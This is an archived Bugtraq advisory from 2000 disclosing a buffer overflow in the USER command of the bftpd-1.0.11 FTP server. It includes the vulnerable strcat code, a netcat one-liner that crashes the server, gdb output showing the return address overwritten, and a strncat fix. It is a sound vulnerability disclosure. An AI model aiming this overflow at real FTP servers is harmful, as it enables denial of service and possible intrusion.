![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Fri, 27 Oct 2000 18:23:33 +0200
From: BAILLEUX Christophe <cb@GROLIER.FR>
Subject: Potential Security Problem in bftpd-1.0.11
To: BUGTRAQ@SECURITYFOCUS.COM
Subject : Potential security problem in bftpd (Buffer Overflow)
Author : Christophe BAILLEUX (cb@grolier.fr)
Plateforms : *nix
Test version : bftpd-1.0.11
I. Introduction
bftpd is a Linux FTP server with chroot and setreuid. Not all FTP commands
are included.
It accesses either the user's home directory or its.
ftp subdirectory, and user authentication is via passwd/shadow or PAM.
II. Problem
The lastest version of bftp has a potential security problem when
entering the USER command.
The problem is a potential Overflow Vulnerability when entering more 35
characteres in USER command.
III. Details/Demo
a) Code problem
bftpd-1.0.11/commands.c
102 void command_user(char *username) {
103 char *alias;
104 char name[USERLEN + 7] = "ALIAS_";
105 if(state) {
106 fprintf(stderr, "503 Username already given.\r\n");
107 return;
108 }
109 alias = (char *) config_getoption(strcat(name, username));
110 if(alias[0] != '\0')
b) Demo / gdb output
tshaw:~$ printf "user `perl -e 'print"A"x37'`\n" | nc localhost 21
tshaw:/home/cb/bftpd-1.0.11# gdb /usr/sbin/bftpd 6613
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
Attaching to program: /usr/sbin/bftpd, Pid 6624
Reading symbols from /lib/libcrypt.so.1...done.
Loaded symbols for /lib/libcrypt.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
0x400e7514 in read () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
(gdb) x $esp
0xbffffcb8: 0x41414141
(gdb)
IV. Exploit
It's not possible to exploit it with a standart exploit...
commands.c contains a piece of code filtering non-writable chars, eg : NOP, shellcode...
469 for(i = 0; i < strlen(str); i++) { /* Remove Internet Explorer
garbage
*/
470 if(str[i] < 32) {
471 memmove((char *) ((int) str + i),
472 (char *) ((int) str + i + 1),
473 strlen(str) - i);
474 i--; /* If junk is found, don't increment counter in next
loop. */
475 }
476 }
V. Workaround
In bftpd-1.0.11/commands.c
Modify the line 109
alias = (char *) config_getoption(strcat(name, username));
by
alias = (char *) config_getoption(strncat(name, username, USERLEN));
bftpd team has been informed.
VI. Greetings :)
Greetings to kalou, kli deda, Geudou deda and all DEDA TEAM!@# :)
Thanks bdev for your help :)
Best regards,
--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr